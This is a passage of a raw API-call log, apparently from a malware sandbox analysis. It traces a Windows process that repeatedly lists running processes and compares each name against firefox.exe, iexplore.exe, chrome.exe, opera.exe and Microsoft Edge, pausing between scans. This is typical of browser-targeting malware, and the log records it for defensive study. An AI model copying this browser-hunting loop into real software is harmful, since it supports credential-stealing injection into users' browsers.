returned 1 [0245.460] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0245.460] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0245.460] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0245.460] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0245.460] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.460] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0245.460] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0245.461] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0245.461] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0245.461] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0245.461] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.461] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0245.461] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0245.461] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0245.461] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0245.461] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0245.461] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.461] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0245.462] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0245.462] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0245.462] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0245.462] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0245.462] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.462] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0245.462] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0245.462] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0245.462] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0245.462] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0245.462] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.462] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0245.463] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0245.463] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0245.463] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0245.463] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0245.463] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.463] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0245.463] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0245.463] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0245.463] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0245.464] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0245.464] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.464] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0245.464] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0245.464] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0245.464] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0245.464] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0245.464] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.464] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0245.465] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0245.465] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0245.465] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0245.465] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0245.465] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.465] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0245.465] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0245.465] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0245.465] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0245.465] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0245.465] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.465] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0245.466] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0245.466] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0245.466] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0245.466] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0245.466] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.466] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0245.466] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0245.466] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0245.466] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0245.466] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0245.467] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.467] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0245.467] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0245.467] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0245.467] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0245.467] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0245.467] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.467] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0245.468] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0245.468] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0245.468] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0245.468] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0245.468] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.468] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0245.468] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0245.468] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0245.468] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0245.468] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0245.468] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.468] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0245.469] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0245.469] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0245.469] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0245.469] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0245.469] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.469] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0245.469] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0245.469] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0245.469] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0245.469] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0245.469] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.469] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0245.470] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0245.470] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0245.470] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0245.470] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0245.470] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.470] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0245.471] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0245.471] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0245.471] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0245.471] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0245.471] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.471] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0245.471] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0245.471] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0245.471] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0245.471] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0245.471] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.471] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0245.472] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0245.472] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0245.472] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0245.472] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0245.472] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.472] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.472] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0245.472] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0245.472] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0245.472] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0245.472] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.472] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.473] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.473] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.473] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.473] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.473] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.473] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0245.473] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0245.473] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0245.473] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0245.473] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0245.473] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.474] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.474] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.474] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.474] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.474] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0245.474] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.474] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.475] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0245.475] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0245.475] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0245.475] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0245.475] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.475] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.475] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.475] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.475] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.475] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0245.475] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.475] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0245.476] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0245.476] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0245.476] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0245.476] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0245.476] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.476] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.476] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0245.476] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0245.476] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0245.476] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0245.476] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.477] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.477] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.477] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.477] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.477] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0245.477] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.477] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.478] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0245.478] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.478] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.479] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.479] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.479] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.479] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0245.479] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.479] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0245.479] CloseHandle (hObject=0xe8) returned 1 [0245.479] Sleep (dwMilliseconds=0x3e8) [0246.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0246.498] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.499] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0246.499] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0246.499] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0246.499] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0246.499] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0246.499] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.499] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0246.499] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0246.499] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0246.500] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0246.500] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0246.500] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.500] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0246.500] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0246.500] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0246.500] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0246.500] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.500] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, 